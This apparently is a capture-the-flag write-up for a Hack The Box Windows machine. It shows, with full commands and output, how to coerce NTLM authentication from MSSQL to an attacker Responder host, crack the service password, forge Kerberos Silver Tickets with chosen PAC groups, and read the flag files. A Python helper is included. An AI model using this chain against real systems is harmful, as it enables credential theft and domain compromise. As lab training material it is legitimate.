HTB — Signed
MSSQL xp_dirtree coerces the SQL service account into NTLM authentication; the cracked password yields its NT hash, which is enough to forge a Kerberos Silver Ticket for the MSSQLSvc SPN. A PAC that claims membership of the sysadmin-holding IT group gives xp_cmdshell (user.txt); a second one that adds Domain Admins lets OPENROWSET read root.txt.
mssql
As is common in real-life Windows penetration tests, you start the Signed box with credentials for the following account, which can be used to access the MSSQL service: scott / Sm230#C5NatH
dirtree
scott is only a low-privileged SQL login (mapped to guest in master, as the prompt shows), but xp_dirtree is executable by public. Pointing it at a UNC path on our host makes the SQL Server service account authenticate to our SMB listener and leak its NetNTLMv2 response; the empty result set below does not matter.
impacket-mssqlclient scott@DC01.SIGNED.HTB
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)> EXEC master..xp_dirtree '\\10.10.14.4\share\'
subdirectory depth
------------ -----
responder
sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.4]
Responder IPv6 [dead:beef:2::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-7FY2RXLEYTB]
Responder Domain Name [FCHO.LOCAL]
Responder DCE-RPC Port [48929]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:f1cbcfcdcc79e32a:...
The captured NetNTLMv2 response is hashcat mode 5600; rockyou cracks it:
hashcat -m 5600 mssqlsvc_ntlmv2.hash /usr/share/wordlists/rockyou.txt
MSSQLSVC::SIGNED:f1cbcfcdcc79e32a:bf0c8d83...:...:purPLE9795!@
impacket-mssqlclient mssqlsvc@DC01.SIGNED.HTB -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
Password: purPLE9795!@
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
mssql domain user enum
[msf](Jobs:0 Agents:0) >> use auxiliary/admin/mssql/mssql_enum_domain_accounts
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set rhosts 10.10.11.90
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set username mssqlsvc
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set password purPLE9795!@
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> set use_windows_authent true
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_enum_domain_accounts) >> run
[*] Running module against 10.10.11.90
[*] 10.10.11.90:1433 - Attempting to connect to the database server at 10.10.11.90:1433 as mssqlsvc...
[+] 10.10.11.90:1433 - Connected.
[*] 10.10.11.90:1433 - SQL Server Name: DC01
[*] 10.10.11.90:1433 - Domain Name: SIGNED
[+] 10.10.11.90:1433 - Found the domain sid: 0105000000000005150000005b7bb0f398aa2245ad4a1ca4
[*] 10.10.11.90:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.11.90:1433 - - SIGNED\Administrator
[*] 10.10.11.90:1433 - - SIGNED\Guest
[*] 10.10.11.90:1433 - - SIGNED\krbtgt
[*] 10.10.11.90:1433 - - SIGNED\Domain Admins
[*] 10.10.11.90:1433 - - SIGNED\Domain Users
[*] 10.10.11.90:1433 - - SIGNED\Domain Guests
[*] 10.10.11.90:1433 - - SIGNED\Domain Computers
[*] 10.10.11.90:1433 - - SIGNED\Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Cert Publishers
[*] 10.10.11.90:1433 - - SIGNED\Schema Admins
[*] 10.10.11.90:1433 - - SIGNED\Enterprise Admins
[*] 10.10.11.90:1433 - - SIGNED\Group Policy Creator Owners
[*] 10.10.11.90:1433 - - SIGNED\Read-only Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Cloneable Domain Controllers
[*] 10.10.11.90:1433 - - SIGNED\Protected Users
[*] 10.10.11.90:1433 - - SIGNED\Key Admins
[*] 10.10.11.90:1433 - - SIGNED\Enterprise Key Admins
[*] 10.10.11.90:1433 - - SIGNED\RAS and IAS Servers
[*] 10.10.11.90:1433 - - SIGNED\Allowed RODC Password Replication Group
[*] 10.10.11.90:1433 - - SIGNED\Denied RODC Password Replication Group
[*] 10.10.11.90:1433 - - SIGNED\DC01$
[*] 10.10.11.90:1433 - - SIGNED\DnsAdmins
[*] 10.10.11.90:1433 - - SIGNED\DnsUpdateProxy
[*] 10.10.11.90:1433 - - SIGNED\mssqlsvc
[*] 10.10.11.90:1433 - - SIGNED\HR
[*] 10.10.11.90:1433 - - SIGNED\IT
[*] 10.10.11.90:1433 - - SIGNED\Finance
[*] 10.10.11.90:1433 - - SIGNED\Developers
[*] 10.10.11.90:1433 - - SIGNED\Support
[*] 10.10.11.90:1433 - - SIGNED\oliver.mills
[*] 10.10.11.90:1433 - - SIGNED\emma.clark
[*] 10.10.11.90:1433 - - SIGNED\liam.wright
[*] 10.10.11.90:1433 - - SIGNED\noah.adams
[*] 10.10.11.90:1433 - - SIGNED\ava.morris
[*] 10.10.11.90:1433 - - SIGNED\sophia.turner
[*] 10.10.11.90:1433 - - SIGNED\james.morgan
[*] 10.10.11.90:1433 - - SIGNED\mia.cooper
[*] 10.10.11.90:1433 - - SIGNED\elijah.brooks
[*] 10.10.11.90:1433 - - SIGNED\isabella.evans
[*] 10.10.11.90:1433 - - SIGNED\lucas.murphy
[*] 10.10.11.90:1433 - - SIGNED\william.johnson
[*] 10.10.11.90:1433 - - SIGNED\charlotte.price
[*] 10.10.11.90:1433 - - SIGNED\henry.bennett
[*] 10.10.11.90:1433 - - SIGNED\amelia.kelly
[*] 10.10.11.90:1433 - - SIGNED\jackson.gray
[*] 10.10.11.90:1433 - - SIGNED\harper.diaz
[*] 10.10.11.90:1433 - - SIGNED\SQLServer2005SQLBrowserUser$DC01
enum_logins
SQL (SIGNED\mssqlsvc guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
scott SQL_LOGIN 0 0 0 0 0 0 0 0 0
SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
The interesting row is SIGNED\IT: a Windows group login that holds sysadmin, while mssqlsvc itself only arrives through Domain Users and lands as guest. A Kerberos ticket whose PAC lists the IT group's RID will therefore be treated as sysadmin. SUSER_SID returns the binary SID of any principal the server can resolve; everything before the final sub-authority is the domain SID, the final one is the RID.

Retrieve the Domain's SID
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\mssqlsvc');
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
SQL (SIGNED\mssqlsvc guest@master)> SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\mssqlsvc')) AS HexSID;
HexSID
----------------------------------------------------------
0x0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000
python3
Python 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> h="0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
>>> b=bytes.fromhex(h)
>>> rev=b[0];cnt=b[1];id_auth=int.from_bytes(b[2:8],'big')
>>> subs=[str(int.from_bytes(b[8+i*4:12+i*4],'little')) for i in range(cnt)]
>>> print(f"S-{rev}-{id_auth}-" + "-".join(subs))
S-1-5-21-4088429403-1159899800-2753317549-1103
SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\IT');
-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
python3
Python 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> h="0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
>>> b=bytes.fromhex(h)
>>> rev=b[0];cnt=b[1];id_auth=int.from_bytes(b[2:8],'big')
>>> subs=[str(int.from_bytes(b[8+i*4:12+i*4],'little')) for i in range(cnt)]
>>> print(f"S-{rev}-{id_auth}-" + "-".join(subs))
S-1-5-21-4088429403-1159899800-2753317549-1105

convert mssql password to nthash (MD4)
The NT hash is MD4 over the UTF-16LE encoding of the password, which is the form ticketer.py expects in -nthash. On OpenSSL 3 builds MD4 only exists in the legacy provider, so the openssl call may need -provider legacy -provider default appended.
echo -n 'purPLE9795!@' | iconv -f utf8 -t utf16le | openssl dgst -md4
MD4(stdin)= ef699384...

Create a Silver Ticket with ticketer.py
A service ticket for MSSQLSvc is encrypted with the service account's key, and with RC4-HMAC that key is this NT hash. Holding it, we can sign a TGS for the SPN ourselves: the DC is never consulted and every PAC field is ours to choose, here user RID 500 (Administrator) plus group RID 1105, the IT group that holds sysadmin on the instance.
impacket-ticketer -nthash ef699384... -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.SIGNED.HTB:1433 -groups 1105 -user-id 500 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
Importing the Ticket and using it
export KRB5CCNAME=./Administrator.ccache
impacket-mssqlclient -k -no-pass administrator@DC01.SIGNED.HTB -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
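The SID decoding done by hand twice above, the RID cycling the Metasploit module performed, and the MD4 step are consolidated below as an added example; it is not code from the original writeup. It uses only the two SID values and the password already shown on this page; the function names are mine. MD4 is implemented directly because hashlib and openssl on OpenSSL 3 systems refuse MD4 unless the legacy provider is loaded.

```python
#!/usr/bin/env python3
"""Added example: derive the three inputs ticketer.py needs (domain SID, RIDs, NT hash)
from the values already collected on this page. Not part of the original writeup."""
import struct

# Binary SIDs exactly as SUSER_SID returned them above (mssqlsvc = RID 1103, IT = RID 1105).
MSSQLSVC_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
IT_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"


def sid_to_str(raw: bytes) -> str:
    """Decode a binary SID: Revision(1) | SubAuthorityCount(1) | IdentifierAuthority(6, big-endian)
    | SubAuthority[count] (4 bytes each, little-endian)."""
    rev, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match SubAuthorityCount")
    id_auth = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d-%s" % (rev, id_auth, "-".join(str(s) for s in subs))


def sid_from_str(sid: str) -> bytes:
    """Inverse of sid_to_str: lets us fabricate the binary SID of any RID in the domain."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("expected S-R-I-S... form")
    rev, id_auth = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return bytes([rev, len(subs)]) + id_auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def split_rid(sid: str):
    """'S-1-5-21-a-b-c-1103' -> ('S-1-5-21-a-b-c', 1103): the -domain-sid argument and the RID."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def suser_sname_probe(domain_sid: str, rid: int) -> str:
    """T-SQL resolving one RID to a name; looping it over a RID range from any SQL login is the
    RID cycling that mssql_enum_domain_accounts performs against the server."""
    return "SELECT SUSER_SNAME(0x%s);" % sid_from_str("%s-%d" % (domain_sid, rid)).hex()


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; OpenSSL 3 only offers MD4 through its legacy provider."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    # (round function, additive constant, per-step shifts, message word order) for rounds 1..3
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: the next step updates what was d
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); also the RC4-HMAC Kerberos key ticketer.py takes via -nthash."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    user_sid = sid_to_str(bytes.fromhex(MSSQLSVC_SID_HEX))
    domain_sid, user_rid = split_rid(user_sid)
    _, it_rid = split_rid(sid_to_str(bytes.fromhex(IT_SID_HEX)))
    print("-domain-sid :", domain_sid)
    print("-user-id    :", user_rid, "   -groups:", it_rid)
    print("RID probe   :", suser_sname_probe(domain_sid, 500))
    print("-nthash     :", nt_hash("purPLE9795!@"))
```

Running it prints the -domain-sid value, both RIDs, one SUSER_SNAME probe (paste it into the SQL prompt and vary the RID to reproduce the account list the Metasploit module produced) and the -nthash value, so the ticketer.py command line above can be rebuilt without openssl or iconv.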
part of the sysadmin role
The prompt now reads dbo@master instead of guest@master: the group membership we put in the PAC was honoured.
SQL (SIGNED\Administrator dbo@master)> SELECT SYSTEM_USER
--------------------
SIGNED\Administrator
SQL (SIGNED\Administrator dbo@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
1
SQL (SIGNED\Administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1
SQL (SIGNED\Administrator dbo@master)> RECONFIGURE
SQL (SIGNED\Administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
SQL (SIGNED\Administrator dbo@master)> RECONFIGURE
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "whoami"
output
---------------
signed\mssqlsvc
NULL
xp_cmdshell runs under the SQL Server service account, so the shell is signed\mssqlsvc whatever identity the ticket carried.

user.txt
SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "type C:\users\mssqlsvc\desktop\user.txt"
output
--------------------------------
e9753b73...
NULL

priv esc
user.txt sits on mssqlsvc's desktop, but xp_cmdshell can never give us more than the service account. OPENROWSET(BULK) is different: for a Windows-authenticated login SQL Server impersonates the caller when it opens the file, and the caller's token is built from the PAC we forged. A second ticket for mssqlsvc (RID 1103) that carries Domain Admins (512), Enterprise Admins (519) and IT (1105) is enough to read the Administrator's desktop.
impacket-ticketer -nthash ef699384... -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.SIGNED.HTB:1433 -groups 512,519,1105 -user-id 1103 mssqlsvc
export KRB5CCNAME=/home/sake/htb/seasonal/Signed/mssqlsvc.ccache
impacket-mssqlclient -k -no-pass mssqlsvc@DC01.SIGNED.HTB -windows-auth
SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:/users/administrator/desktop/root.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------
b'3bc7536f...\r\n'